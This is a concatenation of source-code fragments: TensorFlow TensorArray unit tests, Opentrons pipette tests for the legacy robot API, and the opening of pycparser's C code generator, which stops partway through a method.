grad_vals = session.run(grad)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([[2.0, -2.0], [20.0, -20.0], [200.0, -200.0],
[2000.0, -2000.0]],
grad_vals[0])
def testCloseTensorArray(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c1 = ta.close()
session.run(c1)
def testSizeTensorArray(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
s = ta.size()
self.assertAllEqual(3, s.eval())
def testWriteCloseTensorArray(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3,
infer_shape=False)
w0 = ta.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [3.0])
w1.close().run() # Expected to run without problems
# TODO(phawkins): implement while loops.
# def _testWhileLoopWritePackGradients(self, dynamic_size, dtype):
# np_dtype = dtype.as_numpy_dtype
# with self.test_session() as session, self.test_scope():
# v0 = array_ops.identity(np.arange(3 * 5, dtype=np_dtype).reshape(3, 5))
# var = variables.Variable(np.arange(100, 105, dtype=np_dtype))
# state0 = array_ops.identity(np.array([1] * 5, dtype=np_dtype))
# ta = tensor_array_ops.TensorArray(
# dtype=dtype,
# tensor_array_name="foo",
# size=0 if dynamic_size else 3,
# dynamic_size=dynamic_size)
# time_0 = array_ops.identity(0)
# def body(time, ta_t, state):
# sliced = array_ops.slice(
# v0, begin=array_ops.stack([time, 0]), size=[1, -1])
# sliced = array_ops.squeeze(sliced)
# out = sliced + var + state
# state += sliced
# ta_t = ta_t.write(time, out)
# return (time + 1, ta_t, state)
# (unused_0, h_final, unused_2) = control_flow_ops.while_loop(
# cond=lambda time, unused_1, unused_2: time < 3,
# body=body,
# loop_vars=(time_0, ta, state0),
# shape_invariants=(time_0.get_shape(), tensor_shape.unknown_shape(),
# tensor_shape.unknown_shape()),
# parallel_iterations=3)
# vout = h_final.stack()
# grad_val = -np.arange(3 * 5, dtype=np_dtype).reshape(3, 5)
# v0_grad = gradients_impl.gradients([vout], [v0], [grad_val])[0]
# state0_grad = gradients_impl.gradients([vout], [state0], [grad_val])[0]
# var_grad = gradients_impl.gradients([vout], [var], [grad_val])[0]
# variables.global_variables_initializer().run()
# state0_t, var_t, v0_t, vout_t, v0_grad_t, var_grad_t, state0_grad_t = (
# session.run([state0, var, v0, vout, v0_grad, var_grad, state0_grad])
# )
# just_v0_grad_t, = session.run([v0_grad])
# # state = [ state0 | state0 + v0[0] | state0 + v0[0] + v0[1] ]
# # vout = [ v0[0] + var + state[0] |
# # v0[1] + var + state[1] |
# # v0[2] + var + state[2] ]
# # = [ v0[0] + var + state0 |
# # v0[1] + var + state0 + v0[0] |
# # v0[2] + var + state0 + v0[0] + v0[1] ]
# #
# # d(vout[0])/d(v0) = [1 | 0 | 0 ]
# # d(vout[1])/d(v0) = [1 | 1 | 0 ]
# # d(vout[2])/d(v0) = [1 | 1 | 1 ]
# # d(vout)/d(var) = [1 | 1 | 1]
# # d(vout)/d(state0) = [ 1 | 1 | 1 ]
# state_per_time = np.array(
# [state0_t, state0_t + v0_t[0, :],
# state0_t + v0_t[0, :] + v0_t[1, :]])
# # Compare forward prop
# self.assertAllClose(v0_t + var_t + state_per_time, vout_t)
# # Compare backward prop
# expected_v0_grad_t = np.array([
# grad_val[0, :] + grad_val[1, :] + grad_val[2, :],
# grad_val[1, :] + grad_val[2, :], grad_val[2, :]
# ])
# self.assertAllEqual(expected_v0_grad_t, v0_grad_t)
# self.assertAllEqual(expected_v0_grad_t, just_v0_grad_t)
# self.assertAllClose(grad_val.sum(axis=0), var_grad_t)
# self.assertAllClose(grad_val.sum(axis=0), state0_grad_t)
# def testWhileLoopWritePackGradients(self):
# self._testWhileLoopWritePackGradients(
# dynamic_size=False, dtype=dtypes.float32)
# # TODO(ebrevdo): re-enable when While supports non-float32 gradients.
# # self._testWhileLoopWritePackGradients(
# # dynamic_size=False, dtype=tf.int64)
# def testWhileLoopDynamicWritePackGradients(self):
# self._testWhileLoopWritePackGradients(
# dynamic_size=True, dtype=dtypes.float32)
# def testGradSerialTwoLoops(self):
# with self.test_session(), self.test_scope():
# num_steps = 100
# acc = tensor_array_ops.TensorArray(
# dtype=dtypes.float32,
# size=num_steps,
# clear_after_read=False,
# element_shape=tensor_shape.scalar())
# i = constant_op.constant(0, name="i")
# x = constant_op.constant(2.0, name="x")
# c = lambda i, acc: i < 5
# def b(i, acc):
# x1 = control_flow_ops.cond(
# math_ops.equal(i, 0), lambda: x,
# lambda: math_ops.multiply(acc.read(i - 1), 2.0))
# return i + 1, acc.write(i, x1)
# i1, acc1 = control_flow_ops.while_loop(c, b, [i, acc])
# z = constant_op.constant(0.0)
# def fn(i, acc):
# return i + 1, acc.write(i, z)
# _, acc2 = control_flow_ops.while_loop(lambda i, acc: i < num_steps, fn,
# [i1, acc1])
# r = acc2.stack()
# grad = gradients_impl.gradients(r, [x])[0]
# self.assertAllClose(31.0, grad.eval())
def testSumOfTwoReadVariablesWithoutRepeatGrad(self):
with self.test_session() as session, self.test_scope():
a = array_ops.identity(
np.arange(
3 * 5, dtype=np.float32).reshape(3, 5) + 1)
b = array_ops.identity(
np.arange(
3 * 5, dtype=np.float32).reshape(3, 5) + 1 + 3 * 5)
ta = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=2)
ta = ta.write(0, a, name="write_a")
ta = ta.write(1, b, name="write_b")
c = (
ta.read(
0, name="read_a_0") + # a + b
ta.read(
1, name="read_b_0"))
g0 = -(np.arange(3 * 5, dtype=np.float32).reshape(3, 5) + 1)
grad_a = gradients_impl.gradients([c], [a], [g0])[0] # d(a+b)/da = 1
grad_b = gradients_impl.gradients([c], [b], [g0])[0] # d(a+b)/db = 1
# Test gradients calculated individually
grad_a_t, = session.run([grad_a])
self.assertAllEqual(grad_a_t, g0)
grad_b_t, = session.run([grad_b])
self.assertAllEqual(grad_b_t, g0)
# Test gradients calculated jointly.
joint_grad_a_t, joint_grad_b_t = session.run([grad_a, grad_b])
self.assertAllEqual(joint_grad_a_t, g0)
self.assertAllEqual(joint_grad_b_t, g0)
def testWriteShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c0 = constant_op.constant([4.0, 5.0])
w0 = ta.write(0, c0)
r0 = w0.read(0)
self.assertAllEqual(c0.get_shape(), r0.get_shape())
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c1 = constant_op.constant([6.0, 7.0])
w1 = w0.write(1, c1)
r0 = w1.read(0)
r1 = w1.read(1)
self.assertAllEqual(c0.get_shape(), r0.get_shape())
self.assertAllEqual(c1.get_shape(), r1.get_shape())
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c2 = constant_op.constant([4.0, 5.0, 6.0])
with self.assertRaises(ValueError):
w0.write(0, c2)
def testPartlyUnknownShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=6)
c0 = array_ops.placeholder(dtypes.float32, [None, None, None, 3])
w0 = ta.write(0, c0)
r0 = w0.read(0)
self.assertAllEqual([None, None, None, 3], r0.get_shape().as_list())
c1 = array_ops.placeholder(dtypes.float32, [None, None, None, 3])
w1 = w0.write(1, c1)
r1 = w1.read(0)
self.assertAllEqual([None, None, None, 3], r1.get_shape().as_list())
# Writing less specific shape (doesn't change type.)
c2 = array_ops.placeholder(dtypes.float32, [None, None, None, None])
w2 = w1.write(2, c2)
r2 = w2.read(0)
self.assertAllEqual([None, None, None, 3], r2.get_shape().as_list())
# Writing more specific shape in one dimension and less specific in
# another.
c3 = array_ops.placeholder(dtypes.float32, [None, None, 2, None])
w3 = w2.write(3, c3)
r3 = w3.read(0)
self.assertAllEqual([None, None, 2, 3], r3.get_shape().as_list())
# Writing partly defined shape using TensorArray.scatter.
c4 = array_ops.placeholder(dtypes.float32, [2, None, 4, 2, 3])
w4 = w3.scatter([4, 5], c4)
r4 = w4.read(0)
self.assertAllEqual([None, 4, 2, 3], r4.get_shape().as_list())
# Writing fully defined shape using TensorArray.split.
c5 = array_ops.placeholder(dtypes.float32, [10, 4, 2, 3])
w5 = w4.split(c5, constant_op.constant([5, 5]))
r5 = w5.read(0)
self.assertAllEqual([5, 4, 2, 3], r5.get_shape().as_list())
def _testUnpackShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=0,
infer_shape=True)
value = constant_op.constant(
[[1.0, -1.0], [10.0, -10.0], [100.0, -100.0]])
w0 = ta.unstack(value)
r0 = w0.read(0)
self.assertAllEqual((2,), r0.get_shape())
c1 = constant_op.constant([4.0, 5.0])
w1 = w0.write(3, c1)
r1 = w1.read(0)
self.assertAllEqual(c1.get_shape(), r1.get_shape())
c2 = constant_op.constant([4.0, 5.0, 6.0])
with self.assertRaises(ValueError):
w1.write(4, c2)
def testUnpackShape(self):
self._testUnpackShape()
def testSplitShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=0,
infer_shape=True)
value = constant_op.constant([[1.0, -1.0], [2.0, -2.0], [3.0, -3.0]])
w0 = ta.split(value, [1, 1, 1])
r0 = w0.read(0)
self.assertAllEqual((1, 2), r0.get_shape())
ta1 = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo1",
size=0,
infer_shape=True)
w0 = ta1.split(value, [1, 2])
r0 = w0.read(0)
self.assertAllEqual(r0.get_shape(), tensor_shape.unknown_shape())
def testWriteUnknownShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3,
infer_shape=True)
c0 = array_ops.placeholder(dtypes.float32)
w0 = ta.write(0, c0)
r0 = w0.read(0)
self.assertAllEqual(r0.get_shape(), tensor_shape.unknown_shape())
def _testGradientWhenNotAllComponentsRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=2)
x = constant_op.constant([2.0, 3.0])
w = ta.unstack(x)
r0 = w.read(0)
# Calculate (dr0/dx0, dr0/dx1). since r0 = x0, gradients are (1, 0).
grad_r0 = gradients_impl.gradients(ys=[r0], xs=[x], grad_ys=[1.0])
grad_r0_vals = session.run(grad_r0)[0]
self.assertAllEqual(grad_r0_vals, [1.0, 0.0])
def testGradientWhenNotAllComponentsRead(self):
self._testGradientWhenNotAllComponentsRead()
def _testTensorArrayEvalEmpty(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=0, infer_shape=False)
with self.assertRaisesOpError(
"TensorArray has size zero, but element shape <unknown> is not fully "
"defined. Currently only static shapes are supported when packing "
"zero-size TensorArrays."):
ta.stack().eval()
def testTensorArrayEvalEmpty(self):
self._testTensorArrayEvalEmpty()
def _testTensorArrayEvalEmptyWithDefault(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=0, infer_shape=True)
self.assertEqual(0, ta.size().eval())
ta = ta.unstack(array_ops.zeros([0, 3, 5]))
packed = ta.stack()
self.assertAllEqual([0, 3, 5], packed.eval().shape)
# Concatenating zero tensors along their first dimension gives a
# first dimension of zero
self.assertAllEqual([0, 5], ta.concat().eval().shape)
def testTensorArrayEvalEmptyWithDefault(self):
self._testTensorArrayEvalEmptyWithDefault()
def testTensorArrayScatterReadAndGradients(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=10)
indices = constant_op.constant([1, 8])
value = constant_op.constant([[1.0, -1.0], [10.0, -10.0]])
w = ta.scatter(indices, value)
r0 = w.read(1)
r1 = w.read(8)
# Test combined gradients + aggregation of read(0).
grad = gradients_impl.gradients(
ys=[r0, r1], xs=[value], grad_ys=[[2.0, 3.0], [4.0, 5.0]])
read_vals, grad_vals = session.run([[r0, r1], grad])
self.assertEqual(len(read_vals), 2)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([1.0, -1.0], read_vals[0])
self.assertAllEqual([10.0, -10.0], read_vals[1])
self.assertAllEqual([[2.0, 3.0], [4.0, 5.0]], grad_vals[0])
def testTensorArrayWriteGatherAndGradients(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=10)
values = constant_op.constant([[1.0 * x, -1.0 * x] for x in range(10)])
indices = constant_op.constant([1, 8])
w = ta.unstack(values)
g = w.gather(indices)
# Test combined gradients + aggregation of read(0).
grad = gradients_impl.gradients(
ys=[g], xs=[values], grad_ys=[[[2.0, 3.0], [4.0, 5.0]]])
g_vals, grad_vals = session.run([[g], grad])
# Gradients for 8 of the 10 unread components are zero.
expected_grad = np.zeros((10, 2))
expected_grad[1] = [2.0, 3.0]
expected_grad[8] = [4.0, 5.0]
self.assertEqual(len(g_vals), 1)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([[1.0, -1.0], [8.0, -8.0]], g_vals[0])
self.assertAllEqual(expected_grad, grad_vals[0])
def testTensorArrayIdentity(self):
with self.test_session() as session, self.test_scope():
ta0 = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=2,
infer_shape=False)
ta1 = tensor_array_ops.TensorArray(dtype=dtypes.int32, size=4,
infer_shape=True)
ta0 = ta0.write(0, 0.)
ta1 = ta1.write(0, 1)
v0 = resource_variable_ops.ResourceVariable(0)
v1 = resource_variable_ops.ResourceVariable(0)
with ops.control_dependencies([v0.assign_add(1)]):
ta0 = ta0.identity()
with ops.control_dependencies([v1.assign_add(1)]):
ta1 = ta1.identity()
read0 = ta0.read(0)
read1 = ta1.read(0)
size0 = ta0.size()
size1 = ta1.size()
# Tests correct properties on new TensorArrays.
self.assertEqual(dtypes.float32, ta0.dtype)
self.assertEqual(dtypes.int32, ta1.dtype)
self.assertEqual(tensor_shape.unknown_shape(), read0.get_shape())
self.assertEqual(tensor_shape.scalar(), read1.get_shape())
variables.global_variables_initializer().run()
read0_v, read1_v, size0_v, size1_v = session.run(
(read0, read1, size0, size1))
# Tests that the control dependencies was added and executed.
self.assertEqual(1, v0.eval())
self.assertEqual(1, v1.eval())
# Tests correct TensorArray.
self.assertEqual(read0_v, 0)
self.assertEqual(read1_v, 1)
self.assertEqual(size0_v, 2)
self.assertEqual(size1_v, 4)
if __name__ == "__main__":
test.main()
|
|
# pylama:ignore=E501
# TODO: Modify all calls to get a Well to use the `wells` method
from numpy import isclose
from unittest import mock
import pytest
from opentrons.legacy_api.containers import load as containers_load
from opentrons.config import pipette_config
from opentrons.trackers import pose_tracker
@pytest.mark.api1_only
def test_use_filter_tips(instruments, robot):
# test tips with lower working volume than max volume of pipette used to
# ensure that the pipette never over-aspirates with a smaller pipette tip
tipracks = [
'opentrons_96_filtertiprack_10ul',
'opentrons_96_filtertiprack_200ul',
'opentrons_96_filtertiprack_1000ul'
]
for t in tipracks:
robot.reset()
tip_rack = containers_load(robot, t, '3')
plate = containers_load(robot, '96-flat', '1')
p300 = instruments.P300_Single(
mount='left', tip_racks=[tip_rack])
p300.pick_up_tip()
p300.aspirate(plate[0])
# working volume should be the lesser of the pipette max volume
# and the tip max volume
assert p300.current_volume == p300._working_volume
assert p300.current_volume == min(
tip_rack[0].max_volume(), p300.max_volume)
# working volume should revert back to pipette max volume if no tip
# is attached
p300.return_tip()
assert p300._working_volume == p300.max_volume
@pytest.mark.api1_only
def test_shake_during_pick_up(monkeypatch, robot, instruments):
robot.reset()
pip = instruments._create_pipette_from_config(
config=pipette_config.load('p1000_single_v2.0'),
mount='left',
name='p1000_single_v2.0')
tiprack = containers_load(robot, 'opentrons_96_tiprack_1000ul', '1')
shake_tips_pick_up = mock.Mock(
side_effect=pip._shake_off_tips_pick_up)
monkeypatch.setattr(pip, '_shake_off_tips_pick_up',
shake_tips_pick_up)
# Test double shake for after pick up tips
pip.pick_up_tip(tiprack[0])
assert shake_tips_pick_up.call_count == 2
actual_calls = []
def mock_jog(pose_tree, axis, distance):
actual_calls.append((axis, distance))
monkeypatch.setattr(pip, '_jog', mock_jog)
# Test shake in both x and y
shake_tips_pick_up()
expected_calls = [('x', -0.3), ('x', 0.6), ('x', -0.3),
('y', -0.3), ('y', 0.6), ('y', -0.3),
('z', 20)]
assert actual_calls == expected_calls
pip.tip_attached = False
@pytest.mark.api1_only
def test_shake_during_drop(monkeypatch, robot, instruments):
robot.reset()
pip = instruments._create_pipette_from_config(
config=pipette_config.load('p1000_single_v1.5'),
mount='left',
name='p1000_single_v2.0')
tiprack = containers_load(robot, 'opentrons_96_tiprack_1000ul', '1')
shake_tips_drop = mock.Mock(
side_effect=pip._shake_off_tips_drop)
monkeypatch.setattr(pip, '_shake_off_tips_drop',
shake_tips_drop)
# Test single shake for after pick up tips
pip.tip_attached = True
pip.drop_tip(tiprack.wells(0))
assert shake_tips_drop.call_count == 1
actual_calls = []
def jog_side_effect(pose_tree, axis, distance):
actual_calls.append((axis, distance))
jog = mock.Mock(side_effect=jog_side_effect)
monkeypatch.setattr(pip, '_jog', jog)
# Test shake only in x, with no location passed, shake distance is 2.25
shake_tips_drop()
expected_calls = [('x', -2.25), ('x', 4.5), ('x', -2.25),
('z', 20)]
assert actual_calls == expected_calls
# Test drop tip shake at a well with diameter above upper limit (2.25 mm)
tiprack.wells(0).properties['width'] = 2.3*4
actual_calls.clear()
shake_tips_drop(tiprack.wells(0))
expected_calls = [('x', -2.25), ('x', 4.5), ('x', -2.25),
('z', 20)]
assert actual_calls == expected_calls
# Test drop tip shake at a well with diameter between upper limit
# and lower limit (1.00 - 2.25 mm)
tiprack.wells(0).properties['width'] = 2*4
actual_calls.clear()
shake_tips_drop(tiprack.wells(0))
expected_calls = [('x', -2), ('x', 4), ('x', -2),
('z', 20)]
assert actual_calls == expected_calls
# Test drop tip shake at a well with diameter below lower limit (1.00 mm)
tiprack.wells(0).properties['width'] = 0.9*4
actual_calls.clear()
shake_tips_drop(tiprack.wells(0))
expected_calls = [('x', -1), ('x', 2), ('x', -1),
('z', 20)]
assert actual_calls == expected_calls
pip.tip_attached = False
@pytest.mark.api1_only
def test_pipette_version_1_0_and_1_3_extended_travel(robot, instruments):
models = [
'p10_single', 'p10_multi', 'p50_single', 'p50_multi',
'p300_single', 'p300_multi', 'p1000_single'
]
for m in models:
robot.reset()
v1 = m + '_v1'
v13 = m + '_v1.3'
left = instruments._create_pipette_from_config(
config=pipette_config.load(v1),
mount='left',
name=v1)
right = instruments._create_pipette_from_config(
config=pipette_config.load(v13),
mount='right',
name=v13)
# the difference between v1 and v1.3 is that the plunger's travel
# distance extended, allowing greater ranges for aspirate/dispense
# and blow-out. Test that all v1.3 pipette have larger travel thant v1
left_poses = left.plunger_positions
left_diff = left_poses['top'] - left_poses['blow_out']
right_poses = right.plunger_positions
right_diff = right_poses['top'] - right_poses['blow_out']
assert right_diff > left_diff
@pytest.mark.api1_only
def test_all_pipette_models_can_transfer(robot, instruments):
from opentrons.config import pipette_config
models = [
'p10_single', 'p10_multi', 'p50_single', 'p50_multi',
'p300_single', 'p300_multi', 'p1000_single'
]
for m in models:
robot.reset()
v1 = m + '_v1'
v13 = m + '_v1.3'
left = instruments._create_pipette_from_config(
config=pipette_config.load(v1),
mount='left',
name=v1)
right = instruments._create_pipette_from_config(
config=pipette_config.load(v13),
mount='right',
name=v13)
left.tip_attached = True
right.tip_attached = True
left.aspirate().dispense()
right.aspirate().dispense()
@pytest.mark.api1_only
def test_pipette_models_reach_max_volume(robot, instruments):
for model in pipette_config.config_models:
config = pipette_config.load(model)
robot.reset()
pipette = instruments._create_pipette_from_config(
config=config,
mount='right',
name=model)
pipette.tip_attached = True
pipette.aspirate(pipette.max_volume)
pos = pose_tracker.absolute(
robot.poses,
pipette.instrument_actuator)
assert pos[0] < pipette.plunger_positions['top']
@pytest.mark.api1_only
def test_flow_rate(robot, instruments):
# Test new flow-rate functionality on all pipettes with different max vols
robot.reset()
p10 = instruments.P10_Single(mount='right')
p10.set_flow_rate(aspirate=10)
ul_per_mm = p10._ul_per_mm(p10.max_volume, 'aspirate')
expected_mm_per_sec = round(10 / ul_per_mm, 6)
assert p10.speeds['aspirate'] == expected_mm_per_sec
p10.set_flow_rate(dispense=20)
ul_per_mm = p10._ul_per_mm(p10.max_volume, 'dispense')
expected_mm_per_sec = round(20 / ul_per_mm, 6)
assert p10.speeds['dispense'] == expected_mm_per_sec
robot.reset()
p50 = instruments.P50_Single(mount='right')
p50.set_flow_rate(aspirate=50)
ul_per_mm = p50._ul_per_mm(p50.max_volume, 'aspirate')
expected_mm_per_sec = round(50 / ul_per_mm, 6)
assert p50.speeds['aspirate'] == expected_mm_per_sec
p50.set_flow_rate(dispense=60)
ul_per_mm = p50._ul_per_mm(p50.max_volume, 'dispense')
expected_mm_per_sec = round(60 / ul_per_mm, 6)
assert p50.speeds['dispense'] == expected_mm_per_sec
robot.reset()
p300 = instruments.P300_Single(mount='right')
p300.set_flow_rate(aspirate=300)
ul_per_mm = p300._ul_per_mm(p300.max_volume, 'aspirate')
expected_mm_per_sec = round(300 / ul_per_mm, 6)
assert p300.speeds['aspirate'] == expected_mm_per_sec
p300.set_flow_rate(dispense=310)
ul_per_mm = p300._ul_per_mm(p300.max_volume, 'dispense')
expected_mm_per_sec = round(310 / ul_per_mm, 6)
assert p300.speeds['dispense'] == expected_mm_per_sec
robot.reset()
p1000 = instruments.P1000_Single(mount='right')
p1000.set_flow_rate(aspirate=1000)
ul_per_mm = p1000._ul_per_mm(p1000.max_volume, 'aspirate')
expected_mm_per_sec = round(1000 / ul_per_mm, 6)
assert p1000.speeds['aspirate'] == expected_mm_per_sec
p1000.set_flow_rate(dispense=1100)
ul_per_mm = p1000._ul_per_mm(p1000.max_volume, 'dispense')
expected_mm_per_sec = round(1100 / ul_per_mm, 6)
assert p1000.speeds['dispense'] == expected_mm_per_sec
@pytest.mark.api1_only
def test_pipette_max_deck_height(robot, instruments):
robot.reset()
tallest_point = robot._driver.homed_position['Z']
p = instruments.P300_Single(mount='left')
assert p._max_deck_height() == tallest_point
# TODO: revise when tip length is on tipracks
for tip_length in [10, 25, 55, 100]:
p._add_tip(length=tip_length)
assert p._max_deck_height() == tallest_point - tip_length
p._remove_tip(length=tip_length)
@pytest.mark.api1_only
def test_retract(robot, instruments):
robot.reset()
plate = containers_load(robot, '96-flat', '1')
p300 = instruments.P300_Single(mount='left')
from opentrons.drivers.smoothie_drivers.driver_3_0 import HOMED_POSITION
p300.move_to(plate[0].top())
assert p300.previous_placeable == plate[0]
current_pos = pose_tracker.absolute(
robot.poses,
p300)
assert current_pos[2] == plate[0].coordinates()[2]
p300.retract()
assert p300.previous_placeable is None
current_pos = pose_tracker.absolute(
robot.poses,
p300.instrument_mover)
assert current_pos[2] == HOMED_POSITION['A']
@pytest.mark.api1_only
@pytest.mark.xfail
def test_aspirate_move_to(old_aspiration, robot, instruments):
# TODO: it seems like this test is checking that the aspirate point is
# TODO: *fully* at the bottom of the well, which isn't the expected
# TODO: behavior of aspirate when a location is not specified. This should
# TODO: be split into two tests--one for this behavior (specifying a place)
# TODO: and another one for the default
robot.reset()
tip_rack = containers_load(robot, 'tiprack-200ul', '3')
p300 = instruments.P300_Single(
mount='left', tip_racks=[tip_rack])
p300.pick_up_tip()
x, y, z = (161.0, 116.7, 0.0)
plate = containers_load(robot, '96-flat', '1')
well = plate[0]
pos = well.from_center(x=0, y=0, z=-1, reference=plate)
location = (plate, pos)
robot.poses = p300._move(robot.poses, x=x, y=y, z=z)
robot.calibrate_container_with_instrument(plate, p300, False)
p300.aspirate(100, location)
current_pos = pose_tracker.absolute(
robot.poses,
p300.instrument_actuator)
assert isclose(current_pos, (6.9, 0.0, 0.0)).all()
current_pos = pose_tracker.absolute(robot.poses, p300)
assert isclose(current_pos, (161, 116.7, 10.5)).all()
@pytest.mark.api1_only
@pytest.mark.xfail
def test_dispense_move_to(old_aspiration, robot, instruments):
# TODO: same as for aspirate
robot.reset()
tip_rack = containers_load(robot, 'tiprack-200ul', '3')
p300 = instruments.P300_Single(
mount='left',
tip_racks=[tip_rack])
x, y, z = (161.0, 116.7, 0.0)
plate = containers_load(robot, '96-flat', '1')
well = plate[0]
pos = well.from_center(x=0, y=0, z=-1, reference=plate)
location = (plate, pos)
robot.poses = p300._move(robot.poses, x=x, y=y, z=z)
robot.calibrate_container_with_instrument(plate, p300, False)
p300.pick_up_tip()
p300.aspirate(100, location)
p300.dispense(100, location)
current_pos = pose_tracker.absolute(
robot.poses,
p300.instrument_actuator)
assert (current_pos == (1.5, 0.0, 0.0)).all()
current_pos = pose_tracker.absolute(robot.poses, p300)
assert isclose(current_pos, (161, 116.7, 10.5)).all()
@pytest.mark.api1_only
def test_trough_move_to(robot, instruments):
# TODO: new labware system should center multichannel pipettes within wells
# TODO: (correct single-channel position currently corresponds to back-
# TODO: most tip of multi-channel), so calculate against that
robot.reset()
tip_rack = containers_load(robot, 'tiprack-200ul', '3')
p300 = instruments.P300_Single(
mount='left',
tip_racks=[tip_rack])
trough = containers_load(robot, 'trough-12row', '1')
p300.pick_up_tip()
p300.move_to(trough)
current_pos = pose_tracker.absolute(robot.poses, p300)
assert isclose(current_pos, (0, 0, 38)).all()
@pytest.mark.api1_only
def test_delay_calls(monkeypatch, instruments, robot):
from opentrons.legacy_api.instruments import pipette
p300 = instruments.P300_Single(mount='right')
cmd = []
def mock_pause():
nonlocal cmd
cmd.append('pause')
def mock_resume():
nonlocal cmd
cmd.append('resume')
def mock_sleep(seconds):
cmd.append("sleep {}".format(seconds))
def mock_is_simulating():
return False
monkeypatch.setattr(robot, 'is_simulating', mock_is_simulating)
monkeypatch.setattr(robot, 'pause', mock_pause)
monkeypatch.setattr(robot, 'resume', mock_resume)
monkeypatch.setattr(pipette, '_sleep', mock_sleep)
p300.delay(seconds=4, minutes=1)
assert 'pause' in cmd
assert 'sleep 64.0' in cmd
assert 'resume' in cmd
@pytest.mark.xfail
def test_drop_tip_in_trash(monkeypatch, instruments, robot, labware):
from opentrons.legacy_api.instruments.pipette import Pipette
robot.home()
tiprack = labware.load('tiprack-200ul', '1')
p300 = instruments.P300_Multi(mount='left', tip_racks=[tiprack])
p300.pick_up_tip()
movelog = []
move_fn = Pipette.move_to
def log_move(self, location, strategy=None):
movelog.append(location)
move_fn(self, location, strategy)
monkeypatch.setattr(Pipette, "move_to", log_move)
p300.drop_tip()
base_obj = movelog[0][0]
y_offset = movelog[0][1][1]
assert base_obj == robot.fixed_trash[0]
assert y_offset == 111.5
|
|
#------------------------------------------------------------------------------
# pycparser: c_generator.py
#
# C code generator from pycparser AST nodes.
#
# Eli Bendersky [http://eli.thegreenplace.net]
# License: BSD
#------------------------------------------------------------------------------
from . import c_ast
class CGenerator(object):
""" Uses the same visitor pattern as c_ast.NodeVisitor, but modified to
return a value from each visit method, using string accumulation in
generic_visit.
"""
def __init__(self):
# Statements start with indentation of self.indent_level spaces, using
# the _make_indent method
#
self.indent_level = 0
def _make_indent(self):
return ' ' * self.indent_level
def visit(self, node):
method = 'visit_' + node.__class__.__name__
return getattr(self, method, self.generic_visit)(node)
def generic_visit(self, node):
#~ print('generic:', type(node))
if node is None:
return ''
else:
return ''.join(self.visit(c) for c_name, c in node.children())
def visit_Constant(self, n):
return n.value
def visit_ID(self, n):
return n.name
def visit_Pragma(self, n):
ret = '#pragma'
if n.string:
ret += ' ' + n.string
return ret
def visit_ArrayRef(self, n):
arrref = self._parenthesize_unless_simple(n.name)
return arrref + '[' + self.visit(n.subscript) + ']'
def visit_StructRef(self, n):
sref = self._parenthesize_unless_simple(n.name)
return sref + n.type + self.visit(n.field)
def visit_FuncCall(self, n):
fref = self._parenthesize_unless_simple(n.name)
return fref + '(' + self.visit(n.args) + ')'
def visit_UnaryOp(self, n):
operand = self._parenthesize_unless_simple(n.expr)
if n.op == 'p++':
return '%s++' % operand
elif n.op == 'p--':
return '%s--' % operand
elif n.op == 'sizeof':
# Always parenthesize the argument of sizeof since it can be
# a name.
return 'sizeof(%s)' % self.visit(n.expr)
else:
return '%s%s' % (n.op, operand)
def visit_BinaryOp(self, n):
lval_str = self._parenthesize_if(n.left,
lambda d: not self._is_simple_node(d))
rval_str = self._parenthesize_if(n.right,
lambda d: not self._is_simple_node(d))
return '%s %s %s' % (lval_str, n.op, rval_str)
def visit_Assignment(self, n):
rval_str = self._parenthesize_if(
n.rvalue,
lambda n: isinstance(n, c_ast.Assignment))
return '%s %s %s' % (self.visit(n.lvalue), n.op, rval_str)
def visit_IdentifierType(self, n):
return ' '.join(n.names)
def _visit_expr(self, n):
if isinstance(n, c_ast.InitList):
return '{' + self.visit(n) + '}'
elif isinstance(n, c_ast.ExprList):
return '(' + self.visit(n) + ')'
else:
return self.visit(n)
def visit_Decl(self, n, no_type=False):
# no_type is used when a Decl is part of a DeclList, where the type is
# explicitly only for the first declaration in a list.
#
s = n.name if no_type else self._generate_decl(n)
if n.bitsize: s += ' : ' + self.visit(n.bitsize)
if n.init:
s += ' = ' + self._visit_expr(n.init)
return s
def visit_DeclList(self, n):
s = self.visit(n.decls[0])
if len(n.decls) > 1:
s += ', ' + ', '.join(self.visit_Decl(decl, no_type=True)
for decl in n.decls[1:])
return s
def visit_Typedef(self, n):
s = ''
if n.storage: s += ' '.join(n.storage) + ' '
s += self._generate_type(n.type)
return s
def visit_Cast(self, n):
s = '(' + self._generate_type(n.to_type) + ')'
